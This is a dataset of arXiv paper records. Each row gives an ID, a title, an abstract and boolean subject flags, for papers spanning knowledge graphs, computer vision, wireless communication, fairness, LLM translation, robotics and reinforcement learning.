2207.09672 | Duplicate Detection as a Service | Completeness of a knowledge graph is an important quality dimension and factor on how well an application that makes use of it performs. Completeness can be improved by performing knowledge enrichment. Duplicate detection aims to find identity links between the instances of knowledge graphs and is a fundamental subtask of knowledge enrichment. Current solutions to the problem require expert knowledge of the tool and the knowledge graph they are applied to. Users might not have this expert knowledge. We present our service-based approach to the duplicate detection task that provides an easy-to-use no-code solution that is still competitive with the state-of-the-art and has recently been adopted in an industrial context. The evaluation will be based on several frequently used test scenarios. | false | false | false | false | true | true | false | false | false | false | false | false | false | false | false | false | true | false | 308,979 |
1803.04757 | Monitoring Targeted Hate in Online Environments | Hateful comments, swearwords and sometimes even death threats are becoming a reality for many people today in online environments. This is especially true for journalists, politicians, artists, and other public figures. This paper describes how hate directed towards individuals can be measured in online environments using a simple dictionary-based approach. We present a case study on Swedish politicians, and use examples from this study to discuss shortcomings of the proposed dictionary-based approach. We also outline possibilities for potential refinements of the proposed approach. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 92,508 |
2002.07471 | Knowledge Integration Networks for Action Recognition | In this work, we propose Knowledge Integration Networks (referred as KINet) for video action recognition. KINet is capable of aggregating meaningful context features which are of great importance to identifying an action, such as human information and scene context. We design a three-branch architecture consisting of a main branch for action recognition, and two auxiliary branches for human parsing and scene recognition which allow the model to encode the knowledge of human and scene for action recognition. We explore two pre-trained models as teacher networks to distill the knowledge of human and scene for training the auxiliary tasks of KINet. Furthermore, we propose a two-level knowledge encoding mechanism which contains a Cross Branch Integration (CBI) module for encoding the auxiliary knowledge into medium-level convolutional features, and an Action Knowledge Graph (AKG) for effectively fusing high-level context information. This results in an end-to-end trainable framework where the three tasks can be trained collaboratively, allowing the model to compute strong context knowledge efficiently. The proposed KINet achieves the state-of-the-art performance on a large-scale action recognition benchmark Kinetics-400, with a top-1 accuracy of 77.8%. We further demonstrate that our KINet has strong capability by transferring the Kinetics-trained model to UCF-101, where it obtains 97.8% top-1 accuracy. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 164,486 |
2305.02326 | Cybernetic Environment: A Historical Reflection on System, Design, and
Machine Intelligence | Taking on a historical lens, this paper traces the development of cybernetics and systems thinking back to the 1950s, when a group of interdisciplinary scholars converged to create a new theoretical model based on machines and systems for understanding matters of meaning, information, consciousness, and life. By presenting a genealogy of research in the landscape architecture discipline, the paper argues that landscape architects have been an important part of the development of cybernetics by materializing systems based on cybernetic principles in the environment through ecologically based landscape design. The landscape discipline has developed a design framework that provides transformative insights into understanding machine intelligence. The paper calls for a new paradigm of environmental engagement to understand matters of design and machine intelligence. | false | false | false | false | true | false | false | true | false | true | true | false | false | false | false | false | false | false | 361,998 |
1711.02757 | Real-Time Road Segmentation Using LiDAR Data Processing on an FPGA | This paper presents the FPGA design of a convolutional neural network (CNN) based road segmentation algorithm for real-time processing of LiDAR data. For autonomous vehicles, it is important to perform road segmentation and obstacle detection such that the drivable region can be identified for path planning. Traditional road segmentation algorithms are mainly based on image data from cameras, which is subject to lighting conditions as well as the quality of road markings. A LiDAR sensor can obtain the 3D geometry information of the vehicle surroundings with very high accuracy. However, it is a computational challenge to process a large amount of LiDAR data in real time. In this work, a convolutional neural network model is proposed and trained to perform semantic segmentation using the LiDAR sensor data. Furthermore, an efficient hardware design is implemented on the FPGA that can process each LiDAR scan in 16.9ms, which is much faster than previous works. Evaluated using KITTI road benchmarks, the proposed solution achieves high accuracy of road segmentation. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 84,106 |
2205.11152 | Cross-lingual Lifelong Learning | The longstanding goal of multi-lingual learning has been to develop a universal cross-lingual model that can withstand the changes in multi-lingual data distributions. There has been a large amount of work to adapt such multi-lingual models to unseen target languages. However, the majority of work in this direction focuses on the standard one-hop transfer learning pipeline from source to target languages, whereas in realistic scenarios, new languages can be incorporated at any time in a sequential manner. In this paper, we present a principled Cross-lingual Continual Learning (CCL) evaluation paradigm, where we analyze different categories of approaches used to continually adapt to emerging data from different languages. We provide insights into what makes multilingual sequential learning particularly challenging. To surmount such challenges, we benchmark a representative set of cross-lingual continual learning algorithms and analyze their knowledge preservation, accumulation, and generalization capabilities compared to baselines on carefully curated datastreams. The implications of this analysis include a recipe for how to measure and balance different cross-lingual continual learning desiderata, which go beyond conventional transfer learning. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 298,021 |
1911.00308 | On Second-Moment Stability of Discrete-Time Linear Systems with General
Stochastic Dynamics | This paper provides a new unified framework for second-moment stability of discrete-time linear systems with stochastic dynamics. Relations of notions of second-moment stability are studied for the systems with general stochastic dynamics, and associated Lyapunov inequalities are derived. Any type of stochastic process can be dealt with as a special case in our framework for determining system dynamics, and our results together with assumptions (i.e., restrictions) on the process immediately lead us to stability conditions for the corresponding special stochastic systems. As a demonstration of usefulness of such a framework, three selected applications are also provided. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 151,786 |
1511.02152 | Iterative Eigenvalue Decomposition and Multipath-Grouping Tx/Rx Joint
Beamforming for Millimeter-Wave Communication | We investigate Tx/Rx joint beamforming in millimeter-wave communications (MMWC). As the multipath components (MPCs) have different steering angles and independent fading, beamforming aims at achieving array gain as well as diversity gain in this scenario. A sub-optimal beamforming scheme is proposed to find the antenna weight vectors (AWVs) at Tx/Rx via iterative eigenvalue decomposition (EVD), provided that full channel state information (CSI) is available at both the transmitter and receiver. To make this scheme practically feasible in MMWC, a corresponding training approach is suggested to avoid the channel estimation and iterative EVD computation. Since in fast-fading scenarios the training approach may be time-consuming due to frequent training, another beamforming scheme, which exploits the quasi-static steering angles in MMWC, is proposed to reduce the overhead and increase the system reliability by multipath grouping (MPG). The scheme first groups the MPCs and then concurrently beamforms towards multiple steering angles of the grouped MPCs, so that both array gain and diversity gain are achieved. Performance comparisons show that, compared with the corresponding state-of-the-art schemes, the iterative EVD scheme with the training approach achieves the same performance with a reduced overhead and complexity, while the MPG scheme achieves better performance with an approximately equivalent complexity. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 48,591 |
2502.08556 | Human-Centric Foundation Models: Perception, Generation and Agentic
Modeling | Human understanding and generation are critical for modeling digital humans and humanoid embodiments. Recently, Human-centric Foundation Models (HcFMs) inspired by the success of generalist models, such as large language and vision models, have emerged to unify diverse human-centric tasks into a single framework, surpassing traditional task-specific approaches. In this survey, we present a comprehensive overview of HcFMs by proposing a taxonomy that categorizes current approaches into four groups: (1) Human-centric Perception Foundation Models that capture fine-grained features for multi-modal 2D and 3D understanding. (2) Human-centric AIGC Foundation Models that generate high-fidelity, diverse human-related content. (3) Unified Perception and Generation Models that integrate these capabilities to enhance both human understanding and synthesis. (4) Human-centric Agentic Foundation Models that extend beyond perception and generation to learn human-like intelligence and interactive behaviors for humanoid embodied tasks. We review state-of-the-art techniques, discuss emerging challenges and future research directions. This survey aims to serve as a roadmap for researchers and practitioners working towards more robust, versatile, and intelligent digital human and embodiments modeling. | false | false | false | false | true | false | true | false | false | false | false | true | false | false | false | false | false | true | 533,057 |
2103.04706 | A Taxonomy of Similarity Metrics for Markov Decision Processes | Although the notion of task similarity is potentially interesting in a wide range of areas such as curriculum learning or automated planning, it has mostly been tied to transfer learning. Transfer is based on the idea of reusing the knowledge acquired in the learning of a set of source tasks to a new learning process in a target task, assuming that the target and source tasks are close enough. In recent years, transfer learning has succeeded in making Reinforcement Learning (RL) algorithms more efficient (e.g., by reducing the number of samples needed to achieve the (near-)optimal performance). Transfer in RL is based on the core concept of similarity: whenever the tasks are similar, the transferred knowledge can be reused to solve the target task and significantly improve the learning performance. Therefore, the selection of good metrics to measure these similarities is a critical aspect when building transfer RL algorithms, especially when this knowledge is transferred from simulation to the real world. In the literature, there are many metrics to measure the similarity between MDPs, hence, many definitions of similarity or its complement distance have been considered. In this paper, we propose a categorization of these metrics and analyze the definitions of similarity proposed so far, taking into account such categorization. We also follow this taxonomy to survey the existing literature, as well as suggesting future directions for the construction of new metrics. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 223,734 |
2203.10451 | On the Computation of Necessary and Sufficient Explanations | The complete reason behind a decision is a Boolean formula that characterizes why the decision was made. This recently introduced notion has a number of applications, which include generating explanations, detecting decision bias and evaluating counterfactual queries. Prime implicants of the complete reason are known as sufficient reasons for the decision and they correspond to what is known as PI explanations and abductive explanations. In this paper, we refer to the prime implicates of a complete reason as necessary reasons for the decision. We justify this terminology semantically and show that necessary reasons correspond to what is known as contrastive explanations. We also study the computation of complete reasons for multi-class decision trees and graphs with nominal and numeric features for which we derive efficient, closed-form complete reasons. We further investigate the computation of shortest necessary and sufficient reasons for a broad class of complete reasons, which include the derived closed forms and the complete reasons for Sentential Decision Diagrams (SDDs). We provide an algorithm which can enumerate their shortest necessary reasons in output polynomial time. Enumerating shortest sufficient reasons for this class of complete reasons is hard even for a single reason. For this problem, we provide an algorithm that appears to be quite efficient as we show empirically. | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | false | true | 286,543 |
2211.06106 | Identifying, measuring, and mitigating individual unfairness for
supervised learning models and application to credit risk models | In the past few years, Artificial Intelligence (AI) has garnered attention from various industries including financial services (FS). AI has made a positive impact in financial services by enhancing productivity and improving risk management. While AI can offer efficient solutions, it has the potential to bring unintended consequences. One such consequence is the pronounced effect of AI-related unfairness and attendant fairness-related harms. These fairness-related harms could involve differential treatment of individuals; for example, unfairly denying a loan to certain individuals or groups of individuals. In this paper, we focus on identifying and mitigating individual unfairness and leveraging some of the recently published techniques in this domain, especially as applicable to the credit adjudication use case. We also investigate the extent to which techniques for achieving individual fairness are effective at achieving group fairness. Our main contribution in this work is functionalizing a two-step training process which involves learning a fair similarity metric from a group sense using a small portion of the raw data and training an individually "fair" classifier using the rest of the data where the sensitive features are excluded. The key characteristic of this two-step technique is related to its flexibility, i.e., the fair metric obtained in the first step can be used with any other individual fairness algorithms in the second step. Furthermore, we developed a second metric (distinct from the fair similarity metric) to determine how fairly a model is treating similar individuals. We use this metric to compare a "fair" model against its baseline model in terms of their individual fairness value. Finally, some experimental results corresponding to the individual unfairness mitigation techniques are presented. 
| false | false | false | false | true | false | true | false | false | false | false | false | false | true | false | false | false | false | 329,782 |
2309.07423 | ChatGPT MT: Competitive for High- (but not Low-) Resource Languages | Large language models (LLMs) implicitly learn to perform a range of language tasks, including machine translation (MT). Previous studies explore aspects of LLMs' MT capabilities. However, there exist a wide variety of languages for which recent LLM MT performance has never before been evaluated. Without published experimental evidence on the matter, it is difficult for speakers of the world's diverse languages to know how and whether they can use LLMs for their languages. We present the first experimental evidence for an expansive set of 204 languages, along with MT cost analysis, using the FLORES-200 benchmark. Trends reveal that GPT models approach or exceed traditional MT model performance for some high-resource languages (HRLs) but consistently lag for low-resource languages (LRLs), under-performing traditional MT for 84.1% of languages we covered. Our analysis reveals that a language's resource level is the most important feature in determining ChatGPT's relative ability to translate it, and suggests that ChatGPT is especially disadvantaged for LRLs and African languages. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 391,776 |
2410.11670 | Leveraging Structure Knowledge and Deep Models for the Detection of Abnormal Handwritten Text | Currently, the destruction of the sequence structure in handwritten text has become one of the main bottlenecks restricting the recognition task. The typical situations include additional specific markers (the text swapping modification) and the text overlap caused by character modifications like deletion, replacement, and insertion. In this paper, we propose a two-stage detection algorithm that combines structure knowledge and deep models for the above mentioned text. Firstly, different structure prototypes are roughly located from handwritten text images. Based on the detection results of the first stage, in the second stage, we adopt different strategies. Specifically, a shape regression network trained by a novel semi-supervised contrast training strategy is introduced and the positional relationship between the characters is fully employed. Experiments on two handwritten text datasets show that the proposed method can greatly improve the detection performance. The new dataset is available at https://github.com/Wukong90. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 498,665
1204.3678 | Crowd Memory: Learning in the Collective | Crowd algorithms often assume workers are inexperienced and thus fail to adapt as workers in the crowd learn a task. These assumptions fundamentally limit the types of tasks that systems based on such algorithms can handle. This paper explores how the crowd learns and remembers over time in the context of human computation, and how more realistic assumptions of worker experience may be used when designing new systems. We first demonstrate that the crowd can recall information over time and discuss possible implications of crowd memory in the design of crowd algorithms. We then explore crowd learning during a continuous control task. Recent systems are able to disguise dynamic groups of workers as crowd agents to support continuous tasks, but have not yet considered how such agents are able to learn over time. We show, using a real-time gaming setting, that crowd agents can learn over time, and `remember' by passing strategies from one generation of workers to the next, despite high turnover rates in the workers comprising them. We conclude with a discussion of future research directions for crowd memory and learning. | true | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 15,522 |
1608.07730 | Algorithmic complexity of quantum capacity | Recently the theory of communication developed by Shannon has been extended to the quantum realm by exploiting the rules of quantum theory. This latter stems on complex vector spaces. However complex (as well as real) numbers are just idealizations and they are not available in practice where we can only deal with rational numbers. This fact naturally leads to the question of whether the developed notions of capacities for quantum channels truly catch their ability to transmit information. Here we answer this question for the quantum capacity. To this end we resort to the notion of semi-computability in order to approximately (by rational numbers) describe quantum states and quantum channel maps. Then we introduce algorithmic entropies (like algorithmic quantum coherent information) and derive relevant properties for them. Finally we define algorithmic quantum capacity and prove that it equals the standard one. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 60,261 |
1203.0744 | A Report on Multilinear PCA Plus Multilinear LDA to Deal with Tensorial Data: Visual Classification as An Example | In practical applications, we often have to deal with high order data, such as a grayscale image and a video sequence are intrinsically 2nd-order tensor and 3rd-order tensor, respectively. For doing clustering or classification of these high order data, it is a conventional way to vectorize these data before hand, as PCA or FDA does, which often induce the curse of dimensionality problem. For this reason, experts have developed many methods to deal with the tensorial data, such as multilinear PCA, multilinear LDA, and so on. In this paper, we still address the problem of high order data representation and recognition, and propose to study the result of merging multilinear PCA and multilinear LDA into one scenario, we name it \textbf{GDA} for the abbreviation of Generalized Discriminant Analysis. To evaluate GDA, we perform a series of experiments, and the experimental results demonstrate our GDA outperforms a selection of competing methods such (2D)$^2$PCA, (2D)$^2$LDA, and MDA. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 14,716
1711.09195 | Feature Selection Facilitates Learning Mixtures of Discrete Product Distributions | Feature selection can facilitate the learning of mixtures of discrete random variables as they arise, e.g. in crowdsourcing tasks. Intuitively, not all workers are equally reliable but, if the less reliable ones could be eliminated, then learning should be more robust. By analogy with Gaussian mixture models, we seek a low-order statistical approach, and here introduce an algorithm based on the (pairwise) mutual information. This induces an order over workers that is well structured for the `one coin' model. More generally, it is justified by a goodness-of-fit measure and is validated empirically. Improvement in real data sets can be substantial. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 85,350
2403.07193 | CuentosIE: can a chatbot about "tales with a message" help to teach emotional intelligence? | In this article, we present CuentosIE (TalesEI: chatbot of tales with a message to develop Emotional Intelligence), an educational chatbot on emotions that also provides teachers and psychologists with a tool to monitor their students/patients through indicators and data compiled by CuentosIE. The use of "tales with a message" is justified by their simplicity and easy understanding, thanks to their moral or associated metaphors. The main contributions of CuentosIE are the selection, collection, and classification of a set of highly specialized tales, as well as the provision of tools (searching, reading comprehension, chatting, recommending, and classifying) that are useful for both educating users about emotions and monitoring their emotional development. The preliminary evaluation of the tool has obtained encouraging results, which provides an affirmative answer to the question posed in the title of the article. | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | false | false | false | 436,770
1712.08577 | Adaptive Stochastic Dual Coordinate Ascent for Conditional Random Fields | This work investigates the training of conditional random fields (CRFs) via the stochastic dual coordinate ascent (SDCA) algorithm of Shalev-Shwartz and Zhang (2016). SDCA enjoys a linear convergence rate and a strong empirical performance for binary classification problems. However, it has never been used to train CRFs. Yet it benefits from an `exact' line search with a single marginalization oracle call, unlike previous approaches. In this paper, we adapt SDCA to train CRFs, and we enhance it with an adaptive non-uniform sampling strategy based on block duality gaps. We perform experiments on four standard sequence prediction tasks. SDCA demonstrates performances on par with the state of the art, and improves over it on three of the four datasets, which have in common the use of sparse features. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 87,212 |
1312.1038 | Efficient Multi-Robot Motion Planning for Unlabeled Discs in Simple Polygons | We consider the following motion-planning problem: we are given $m$ unit discs in a simple polygon with $n$ vertices, each at their own start position, and we want to move the discs to a given set of $m$ target positions. Contrary to the standard (labeled) version of the problem, each disc is allowed to be moved to any target position, as long as in the end every target position is occupied. We show that this unlabeled version of the problem can be solved in $O(n\log n+mn+m^2)$ time, assuming that the start and target positions are at least some minimal distance from each other. This is in sharp contrast to the standard (labeled) and more general multi-robot motion-planning problem for discs moving in a simple polygon, which is known to be strongly NP-hard. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | true | 28,834
2308.05823 | Vibrational Stabilization of Complex Network Systems | Many natural and man-made network systems need to maintain certain patterns, such as working at equilibria or limit cycles, to function properly. Thus, the ability to stabilize such patterns is crucial. Most of the existing studies on stabilization assume that network systems states can be measured online so that feedback control strategies can be used. However, in many real-world scenarios, systems states, e.g., neuronal activity in the brain, are often difficult to measure. In this paper, we take this situation into account and study the stabilization problem of linear network systems with an open-loop control strategy (vibrational control). We derive a graph-theoretic sufficient condition for structural vibrational stabilizability, under which network systems can always be stabilized. We further provide an approach to select the locations in the network for control placement and design corresponding vibrational inputs to stabilize systems that satisfy this condition. Finally, we provide some numerical results that demonstrate the validity of our theoretical findings. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 384,922 |
2309.09007 | MonoForce: Self-supervised Learning of Physics-informed Model for Predicting Robot-terrain Interaction | While autonomous navigation of mobile robots on rigid terrain is a well-explored problem, navigating on deformable terrain such as tall grass or bushes remains a challenge. To address it, we introduce an explainable, physics-aware and end-to-end differentiable model which predicts the outcome of robot-terrain interaction from camera images, both on rigid and non-rigid terrain. The proposed MonoForce model consists of a black-box module which predicts robot-terrain interaction forces from onboard cameras, followed by a white-box module, which transforms these forces and a control signals into predicted trajectories, using only the laws of classical mechanics. The differentiable white-box module allows backpropagating the predicted trajectory errors into the black-box module, serving as a self-supervised loss that measures consistency between the predicted forces and ground-truth trajectories of the robot. Experimental evaluation on a public dataset and our data has shown that while the prediction capabilities are comparable to state-of-the-art algorithms on rigid terrain, MonoForce shows superior accuracy on non-rigid terrain such as tall grass or bushes. To facilitate the reproducibility of our results, we release both the code and datasets. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 392,432
2404.18863 | PlanNetX: Learning an Efficient Neural Network Planner from MPC for Longitudinal Control | Model predictive control (MPC) is a powerful, optimization-based approach for controlling dynamical systems. However, the computational complexity of online optimization can be problematic on embedded devices. Especially, when we need to guarantee fixed control frequencies. Thus, previous work proposed to reduce the computational burden using imitation learning (IL) approximating the MPC policy by a neural network. In this work, we instead learn the whole planned trajectory of the MPC. We introduce a combination of a novel neural network architecture PlanNetX and a simple loss function based on the state trajectory that leverages the parameterized optimal control structure of the MPC. We validate our approach in the context of autonomous driving by learning a longitudinal planner and benchmarking it extensively in the CommonRoad simulator using synthetic scenarios and scenarios derived from real data. Our experimental results show that we can learn the open-loop MPC trajectory with high accuracy while improving the closed-loop performance of the learned control policy over other baselines like behavior cloning. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 450,415
1411.5461 | Optimal Coding Schemes for the Three-Receiver AWGN Broadcast Channel with Receiver Message Side Information | This paper investigates the capacity region of the three-receiver AWGN broadcast channel where the receivers (i) have private-message requests and (ii) may know some of the messages requested by other receivers as side information. We first classify all 64 possible side information configurations into eight groups, each consisting of eight members. We next construct transmission schemes, and derive new inner and outer bounds for the groups. This establishes the capacity region for 52 out of 64 possible side information configurations. For six groups (i.e., groups 1, 2, 3, 5, 6, and 8 in our terminology), we establish the capacity region for all their members, and show that it tightens both the best known inner and outer bounds. For group 4, our inner and outer bounds tighten the best known inner bound and/or outer bound for all the group members. Moreover, our bounds coincide at certain regions, which can be characterized by two thresholds. For group 7, our inner and outer bounds coincide for four members, thereby establishing the capacity region. For the remaining four members, our bounds tighten both the best known inner and outer bounds. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 37,743
2409.12405 | On the Effectiveness of LLMs for Manual Test Verifications | Background: Manual testing is vital for detecting issues missed by automated tests, but specifying accurate verifications is challenging. Aims: This study aims to explore the use of Large Language Models (LLMs) to produce verifications for manual tests. Method: We conducted two independent and complementary exploratory studies. The first study involved using 2 closed-source and 6 open-source LLMs to generate verifications for manual test steps and evaluate their similarity to original verifications. The second study involved recruiting software testing professionals to assess their perception and agreement with the generated verifications compared to the original ones. Results: The open-source models Mistral-7B and Phi-3-mini-4k demonstrated effectiveness and consistency comparable to closed-source models like Gemini-1.5-flash and GPT-3.5-turbo in generating manual test verifications. However, the agreement level among professional testers was slightly above 40%, indicating both promise and room for improvement. While some LLM-generated verifications were considered better than the originals, there were also concerns about AI hallucinations, where verifications significantly deviated from expectations. Conclusion: We contributed by generating a dataset of 37,040 test verifications using 8 different LLMs. Although the models show potential, the relatively modest 40% agreement level highlights the need for further refinement. Enhancing the accuracy, relevance, and clarity of the generated verifications is crucial to ensure greater reliability in real-world testing scenarios. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | true | 489,572 |
2004.13874 | Histogram-based Auto Segmentation: A Novel Approach to Segmenting Integrated Circuit Structures from SEM Images | In the Reverse Engineering and Hardware Assurance domain, a majority of the data acquisition is done through electron microscopy techniques such as Scanning Electron Microscopy (SEM). However, unlike its counterparts in optical imaging, only a limited number of techniques are available to enhance and extract information from the raw SEM images. In this paper, we introduce an algorithm to segment out Integrated Circuit (IC) structures from the SEM image. Unlike existing algorithms discussed in this paper, this algorithm is unsupervised, parameter-free and does not require prior information on the noise model or features in the target image making it effective in low quality image acquisition scenarios as well. Furthermore, the results from the application of the algorithm on various structures and layers in the IC are reported and discussed. | false | false | false | false | false | false | false | false | false | false | false | true | true | false | false | false | false | false | 174,698
1103.0086 | A generic trust framework for large-scale open systems using machine learning | In many large scale distributed systems and on the web, agents need to interact with other unknown agents to carry out some tasks or transactions. The ability to reason about and assess the potential risks in carrying out such transactions is essential for providing a safe and reliable environment. A traditional approach to reason about the trustworthiness of a transaction is to determine the trustworthiness of the specific agent involved, derived from the history of its behavior. As a departure from such traditional trust models, we propose a generic, machine learning approach based trust framework where an agent uses its own previous transactions (with other agents) to build a knowledge base, and utilize this to assess the trustworthiness of a transaction based on associated features, which are capable of distinguishing successful transactions from unsuccessful ones. These features are harnessed using appropriate machine learning algorithms to extract relationships between the potential transaction and previous transactions. The trace driven experiments using real auction dataset show that this approach provides good accuracy and is highly efficient compared to other trust mechanisms, especially when historical information of the specific agent is rare, incomplete or inaccurate. | false | false | false | false | false | false | true | false | false | false | false | false | true | false | false | false | false | true | 9,422
2306.02864 | Leveraging Large Language Models for Topic Classification in the Domain of Public Affairs | The analysis of public affairs documents is crucial for citizens as it promotes transparency, accountability, and informed decision-making. It allows citizens to understand government policies, participate in public discourse, and hold representatives accountable. This is crucial, and sometimes a matter of life or death, for companies whose operation depend on certain regulations. Large Language Models (LLMs) have the potential to greatly enhance the analysis of public affairs documents by effectively processing and understanding the complex language used in such documents. In this work, we analyze the performance of LLMs in classifying public affairs documents. As a natural multi-label task, the classification of these documents presents important challenges. In this work, we use a regex-powered tool to collect a database of public affairs documents with more than 33K samples and 22.5M tokens. Our experiments assess the performance of 4 different Spanish LLMs to classify up to 30 different topics in the data in different configurations. The results shows that LLMs can be of great use to process domain-specific documents, such as those in the domain of public affairs. | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | false | false | false | 371,087
1705.02012 | Machine Comprehension by Text-to-Text Neural Question Generation | We propose a recurrent neural model that generates natural-language questions from documents, conditioned on answers. We show how to train the model using a combination of supervised and reinforcement learning. After teacher forcing for standard maximum likelihood training, we fine-tune the model using policy gradient techniques to maximize several rewards that measure question quality. Most notably, one of these rewards is the performance of a question-answering system. We motivate question generation as a means to improve the performance of question answering systems. Our model is trained and evaluated on the recent question-answering dataset SQuAD. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 72,908 |
2501.10129 | Spatio-temporal Graph Learning on Adaptive Mined Key Frames for High-performance Multi-Object Tracking | In the realm of multi-object tracking, the challenge of accurately capturing the spatial and temporal relationships between objects in video sequences remains a significant hurdle. This is further complicated by frequent occurrences of mutual occlusions among objects, which can lead to tracking errors and reduced performance in existing methods. Motivated by these challenges, we propose a novel adaptive key frame mining strategy that addresses the limitations of current tracking approaches. Specifically, we introduce a Key Frame Extraction (KFE) module that leverages reinforcement learning to adaptively segment videos, thereby guiding the tracker to exploit the intrinsic logic of the video content. This approach allows us to capture structured spatial relationships between different objects as well as the temporal relationships of objects across frames. To tackle the issue of object occlusions, we have developed an Intra-Frame Feature Fusion (IFF) module. Unlike traditional graph-based methods that primarily focus on inter-frame feature fusion, our IFF module uses a Graph Convolutional Network (GCN) to facilitate information exchange between the target and surrounding objects within a frame. This innovation significantly enhances target distinguishability and mitigates tracking loss and appearance similarity due to occlusions. By combining the strengths of both long and short trajectories and considering the spatial relationships between objects, our proposed tracker achieves impressive results on the MOT17 dataset, i.e., 68.6 HOTA, 81.0 IDF1, 66.6 AssA, and 893 IDS, proving its effectiveness and accuracy. | false | false | false | false | true | false | false | false | false | false | false | true | false | false | false | false | false | false | 525,403
2111.03642 | Grounded Graph Decoding Improves Compositional Generalization in Question Answering | Question answering models struggle to generalize to novel compositions of training patterns, such as longer sequences or more complex test structures. Current end-to-end models learn a flat input embedding which can lose input syntax context. Prior approaches improve generalization by learning permutation invariant models, but these methods do not scale to more complex train-test splits. We propose Grounded Graph Decoding, a method to improve compositional generalization of language representations by grounding structured predictions with an attention mechanism. Grounding enables the model to retain syntax information from the input, thereby significantly improving generalization over complex inputs. By predicting a structured graph containing conjunctions of query clauses, we learn a group invariant representation without making assumptions on the target domain. Our model significantly outperforms state-of-the-art baselines on the Compositional Freebase Questions (CFQ) dataset, a challenging benchmark for compositional generalization in question answering. Moreover, we effectively solve the MCD1 split with 98% accuracy. | false | false | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | 265,232
2207.08815 | Why do tree-based models still outperform deep learning on tabular data? | While deep learning has enabled tremendous progress on text and image datasets, its superiority on tabular data is not clear. We contribute extensive benchmarks of standard and novel deep learning methods as well as tree-based models such as XGBoost and Random Forests, across a large number of datasets and hyperparameter combinations. We define a standard set of 45 datasets from varied domains with clear characteristics of tabular data and a benchmarking methodology accounting for both fitting models and finding good hyperparameters. Results show that tree-based models remain state-of-the-art on medium-sized data ($\sim$10K samples) even without accounting for their superior speed. To understand this gap, we conduct an empirical investigation into the differing inductive biases of tree-based models and Neural Networks (NNs). This leads to a series of challenges which should guide researchers aiming to build tabular-specific NNs: 1. be robust to uninformative features, 2. preserve the orientation of the data, and 3. be able to easily learn irregular functions. To stimulate research on tabular architectures, we contribute a standard benchmark and raw data for baselines: every point of a 20 000 compute hours hyperparameter search for each learner. | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | false | false | 308,697 |
2307.14578 | Distillation-guided Representation Learning for Unconstrained Gait Recognition | Gait recognition holds the promise of robustly identifying subjects based on walking patterns instead of appearance information. While previous approaches have performed well for curated indoor data, they tend to underperform in unconstrained situations, e.g. in outdoor, long distance scenes, etc. We propose a framework, termed GAit DEtection and Recognition (GADER), for human authentication in challenging outdoor scenarios. Specifically, GADER leverages a Double Helical Signature to detect segments that contain human movement and builds discriminative features through a novel gait recognition method, where only frames containing gait information are used. To further enhance robustness, GADER encodes viewpoint information in its architecture, and distills representation from an auxiliary RGB recognition model, which enables GADER to learn from silhouette and RGB data at training time. At test time, GADER only infers from the silhouette modality. We evaluate our method on multiple State-of-The-Arts(SoTA) gait baselines and demonstrate consistent improvements on indoor and outdoor datasets, especially with a significant 25.2% improvement on unconstrained, remote gait data. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 381,977
2310.03932 | Bridging Low-level Geometry to High-level Concepts in Visual Servoing of Robot Manipulation Task Using Event Knowledge Graphs and Vision-Language Models | In this paper, we propose a framework of building knowledgeable robot control in the scope of smart human-robot interaction, by empowering a basic uncalibrated visual servoing controller with contextual knowledge through the joint usage of event knowledge graphs (EKGs) and large-scale pretrained vision-language models (VLMs). The framework is expanded in twofold: first, we interpret low-level image geometry as high-level concepts, allowing us to prompt VLMs and to select geometric features of points and lines for motor control skills; then, we create an event knowledge graph (EKG) to conceptualize a robot manipulation task of interest, where the main body of the EKG is characterized by an executable behavior tree, and the leaves by semantic concepts relevant to the manipulation context. We demonstrate, in an uncalibrated environment with real robot trials, that our method lowers the reliance of human annotation during task interfacing, allows the robot to perform activities of daily living more easily by treating low-level geometric-based motor control skills as high-level concepts, and is beneficial in building cognitive thinking for smart robot applications. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 397,477
2309.00626 | An Ensemble Method of Deep Reinforcement Learning for Automated Cryptocurrency Trading | We propose an ensemble method to improve the generalization performance of trading strategies trained by deep reinforcement learning algorithms in a highly stochastic environment of intraday cryptocurrency portfolio trading. We adopt a model selection method that evaluates on multiple validation periods, and propose a novel mixture distribution policy to effectively ensemble the selected models. We provide a distributional view of the out-of-sample performance on granular test periods to demonstrate the robustness of the strategies in evolving market conditions, and retrain the models periodically to address non-stationarity of financial data. Our proposed ensemble method improves the out-of-sample performance compared with the benchmarks of a deep reinforcement learning strategy and a passive investment strategy. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 389,363
